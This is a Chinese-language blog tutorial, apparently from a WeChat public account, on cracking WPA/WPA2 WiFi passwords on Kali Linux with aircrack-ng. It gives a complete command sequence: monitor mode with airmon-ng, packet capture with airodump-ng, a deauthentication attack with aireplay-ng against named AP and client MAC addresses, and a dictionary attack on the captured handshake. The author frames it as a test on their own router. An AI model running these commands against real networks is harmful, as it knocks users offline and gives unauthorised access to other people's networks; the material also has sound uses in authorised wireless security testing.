干货总结一:aircrack的使用(破解WiFi密码)

 

aircrack使用...



aircrack-ng套件 :

kali系统中已经集成了Aircrack-ng软件:

打开终端,输入命令:aircrack-ng 即可打开工具

在kali下破解无线网络WAP/WAP2 加密密码:

第一步:连接无线网卡并启用ifconfig 查看网卡:此时并没有看到无线网卡的信息,输入命令: ifconfig -a 查看所有设备

出现了 无线网卡 :wlan1现在激活该无线网卡: ifconfigwlan1 up

此时再输入ifconfig 就可以看到被启用的无线网卡 wlan1 了。

另外命令 iwconfig 专用于查看无线网卡:

第二步: 激活无线网卡至monitor即监听模式

用于嗅探的网卡一定要在monitor监听模式,在kali linux下,可以使用Aircrack-ng中的airmon-ng工具来实现。

命令: airmon-ng start wlan1

此时报错:解决方法:把一些有妨碍进程关掉:

airmon-ng check kill

成功激活无线网卡至监听模式:

注意此时无线网卡名变为 wlan1mon第三步:探测无线网络,抓取无线数据包

使用 Aircrack-ng 中的 airodump-ng 工具来实现

a:获取当前无线网络概况:airodump-ngwlan1mon

出现界面:

ESSID 为 WIFI 就是我要测试的无线路由,工作在信道1上,加密类型为WPA2,有一台客户端连接。

抓取无线数据包

另开一终端,输入命令如下:

airodump-ng -c 1 –w yikui wlan1mon

参数解释:

-c 这里我们设置目标AP的工作信道;

-w 后跟要保存的文件名,值得注意的是:这里我们虽然设置保存的文件名是yikui,但是生成的文件却不是yikui.cap,而是yikui-01.cap。

wlan1mon 为之前已经载入并激活监听模式的无线网卡。

第四步:进行Deauth攻击加速破解过程

不要关闭上面的窗口,另开一终端,输入命令:

aireplay-ng -0 10 –a AP的mac -c 客户端的mac wlan1mon

参数解释:

-0 采用deauth攻击模式,后面跟上攻击次数,可设置数字1~10;

-a 后跟AP的MAC地址;

-c 后跟客户端的MAC地址;

所以具体命令为:aireplay-ng -010 -a 64:09:80:12:3A:06 -cF8:A4:5F:50:90:CA wlan1mon

直至airodump-ng 的终端出现“WPA handshake

(这个地方可能会出错,我有时候运行,提示我AP工作在不同信道的问题,这时可尝试重新来过。)

第五步:使用Aircrack-ng破解WPA2加密无线网络

命令:aircrack-ng-w 字典 cap数据包文件

因为是测试,我把正确密码放在一个26M的密码文本文件中,输入命令:aircrack-ng -w ~/桌面/password.txt yikui-01.cap输入“1”,也就是我们所需要破解的WIFI前的数字 ,开始跑字典:

616k/s代表每秒跑了600多个密码。

所以能不能破解成功,完全在于自己的密码字典中有没有一个“正确密码”的存在。跑了17分多钟,终于把密码给找出来了:

Aircrack-ng破解WEP/WPA/WPA2   总结:

1:ifconfig wlan1 up  

激活USB无线网卡

2:airmon-ng start wlan1

更改网卡模式为监听模式,适配器名称变为wlan1mon

     airodump-ng wlan1mon

探测无线AP情况

3:airodump-ng -c 信道 -w 文件名 wlan1mon

探测并抓包

4:aireplay-ng -0 数字 -a AP的MAC -c 客户端MAC wlan1mon

对AP实施Deauth攻击,尝试捕获更完整的数据包

5:aircrack-ng -w 字典 cap数据包文件

挂载字典破解密码

停止监听无线网卡:airmon-ngstop wlan1mon



上面为本人微信公众号二维码,欢迎关注。


    关注 八号半


微信扫一扫关注公众号

0 个评论

要回复文章请先登录注册